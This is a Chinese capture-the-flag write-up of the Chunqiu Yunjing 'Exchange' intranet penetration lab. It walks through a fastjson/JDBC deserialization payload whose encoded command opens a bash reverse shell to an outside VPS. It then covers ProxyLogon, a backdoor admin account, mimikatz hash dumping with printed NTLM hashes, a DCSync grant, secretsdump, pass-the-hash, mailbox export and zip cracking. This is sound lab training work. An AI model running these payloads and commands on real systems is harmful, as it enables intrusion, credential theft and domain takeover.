首页 > 其他分享 >【内网渗透】最保姆级的春秋云镜Exchange打靶笔记

【内网渗透】最保姆级的春秋云镜Exchange打靶笔记

时间:2024-09-07 15:23:08浏览次数:12  
标签:65% 73% Exchange 22% 云镜 打靶 20% 74% 6f%

目录

flag1

flag2

flag3 

flag4


flag1

fscan扫外网

访问8000端口->官方网站 

Java 代码审计之华夏 ERP CMS v2.3 | Drunkbaby's Blog

admin/123456弱口令

打/user/list?search=的jdbc+fj反序列化

vps搭一个MySQL_Fake_Server

payload:

/user/list?search=%7b%20%22%6e%61%6d%65%22%3a%20%7b%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%31%32%34%2e%32%32%32%2e%31%33%36%2e%33%33%22%2c%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%20%22%69%6e%66%6f%22%3a%20%7b%20%22%75%73%65%72%22%3a%20%22%79%73%6f%5f%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%5f%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%6a%51%75%4d%6a%49%79%4c%6a%45%7a%4e%69%34%7a%4d%79%38%78%4d%7a%4d%33%49%44%41%2b%4a%6a%45%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2c%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%20%7d%20%7d%0a

cat /root/flag/flag01.txt

flag2

wget下载fscan和frp,扫内网,搭隧道

172.22.3.12 本机
172.22.3.2 XIAORANG-WIN16 DC
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.26 XIAORANG-PC

 proxylogon打exchange server拿到SYSTEM权限

 创建一个用户rdp上去拿flag

net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add

 

flag3 

 Exchange 机器账户默认对域内成员具有 WriteDACL 权限, 可以写 DCSync

传一个猕猴桃,以管理员身份运行

privilege::debug
sekurlsa::logonpasswords

总结下有用的:

 * Username : XIAORANG-EXC01$
 * Domain   : XIAORANG
 * NTLM     : 63bb769f8b788233f66fc95d25b394cc
 * SHA1     : fab946704b39540fa89f56f53cd65e421d933fcc

 * Username : Zhangtong
 * Domain   : XIAORANG
 * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
 * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
 * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
proxychains4 python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :63bb769f8b788233f66fc95d25b394cc -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

将DCSync权限(用于域同步和密码哈希提取)授予 Zhangtong 账户,目标域为 xiaorang.lab,操作通过IP地址为 172.22.3.2 的域控制器完成。 

 拿Zhangtong去dump域管哈希

proxychains4 impacket-secretsdump xiaorang.lab/[email protected] -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm

pth拿dc

proxychains4 impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/[email protected] -codec gbk

flag4

proxychains4 impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/[email protected] -dc-ip 172.22.3.2

smbclient横向26,Lumia用户桌面有个secret.zip

zip里是flag文件 

pthexchange导出Lumia mailbox里面的全部邮件以及附件

proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download

邮件提示压缩包是用电话号码加密的

下载另一个邮件的csv附件

 写一个脚本提取出phone字段

import csv

# 定义存放电话号码的列表
phone_numbers = []

# 读取CSV文件
with open('phone lists.csv', 'r') as file:
    reader = csv.DictReader(file)  # 使用 DictReader 方便按列名提取数据
    for row in reader:
        phone_numbers.append(row['phone'])  # 提取 phone 列的值并加入列表

# 输出提取的电话号码
for phone in phone_numbers:
    print(phone)

# 如果需要将电话写入到新的文件,也可以这样操作:
with open('extracted_phones.txt', 'w') as output_file:
    for phone in phone_numbers:
        output_file.write(phone + '\n')

爆出密码为18763918468

zip2john secret.zip >zip.txt
john --wordlist=extracted_phones.txt zip.txt

 拿到flag

标签:65%,73%,Exchange,22%,云镜,打靶,20%,74%,6f%
From: https://blog.csdn.net/uuzeray/article/details/141993713

相关文章

  • Exchange 2016部署实施案例篇-04.Ex基础配置篇(中)
    昨天更新了基础配置的上篇《Exchange2016部署实施案例篇-04.Ex基础配置篇(上)》,欢迎各位老铁多多提出宝贵意见,非常感谢。虚拟目录自动发现配置有的朋友可能知道,虽然在虚拟目录里有自动发现这个选项,但自动发现记录在图形化界面无法配置自动发现地址,如图所示 其实自动......
  • 春秋云镜 Delivery
    上来先扔fscan去扫一下发现开放ftp服务允许匿名登录.登录发现存在一个pom.xml文件,内容如下<?xmlversion="1.0"encoding="UTF-8"?><projectxmlns="http://maven.apache.org/POM/4.0.0"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"......
  • 春秋云镜-RCE靶场漏洞复现
    CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行......
  • 春秋云镜 Exchange
    使用fscan进行扫描得到是一个LumiaERP,开放了8000端口存在登录页面.利用网上漏洞进行信息泄露得到账号密码破解密码得到后台登录发现没有写马的地方.这里可以打一个JDBC(不懂java),去打cc6这条链子.在本地去起一个恶意的Mysql服务器,配合ysoserial-all.jar去打JDBC.注意......
  • Exchange 2016部署实施案例篇-03.Exchange部署篇(下)
    昨天我们一起准备完成了ExchangeServer2016的先决条件,今天我们一起来看下如何部署ExchangeServer2016.最近想了想,决定该篇使用2种方式部署ExchangeServer2016,这样可能会让大家对ExchangeServer2016的部署更了解些,废话不多说,开始今天的内容。图形化界面部署......
  • Exchange 2016部署实施案例篇-03.Exchange部署篇(中)
    上一章《Exchange2016部署实施案例篇-03.Exchange部署篇(上)》我们对部署ExchangeServer2016的先决条件做了简单的讲解,接下来我们进入先决条件准备工作。先简单说下环境:服务器名称IP地址系统作用ADSrv01192.168.1.10Win2016GC(已部署完成)ADSrv02192.168.1.20......
  • 解决 Exchange 发到邮件组报错 550 5.1.1 User unknown (in reply to RCPT TO command
    版本2010只需要关闭:要求所有发件人通过身份验证位置:Exchange管理控制台收件人配置通讯组XXX组属性邮件流设置邮件传递设置[√]要求所有发件人通过身份验证取消勾选,再点确定即可参考资料:https://portal.thobson.com/knowledgebase/427/550-511-Use......
  • Exchange 2016部署实施案例篇-03.Exchange部署篇(上)
    距离上一篇《Exchange2016部署实施案例篇-02.活动目录部署篇》博文更新已经过去快一周了,最近一直在忙项目上的事情和软考,整的真心有点身心俱疲啊,最近看了下上一篇博文不知道为什么访问量一直上不去,真心有点心寒啊。希望大家能多多提出宝贵意见,看看如何能让访问量上去。......
  • Exchange 2016部署实施案例篇-02.活动目录部署篇
    其实在写这篇博文之前纠结了好久,到底是该写部署1台AD演示下,还是部署2台活动目录那,比较这个专家还是以Exchang为主,但思来想去最终决定还是部署一主一辅吧,毕竟部署主与辅助还是稍微在步骤上有些不同的,废话不多说,接下来我们开始我们今天的话题,活动目录部署,请大家耐心读奥,有福利奥......
  • Exchange 2016部署实施案例篇-01.架构设计篇(下)
    相信看过上篇Blog《Exchange2016部署实施案例篇-01.架构设计篇(上)》的老铁们可能知道,小弟在上篇Blog中编写了一个需求,不知是否有老铁们已经设计出相对于的架构了,今天我就给大家介绍下我设计的架构。  需求分析我在上篇已经做过了,欢迎各位老铁查阅上一篇博客《Exchange2016......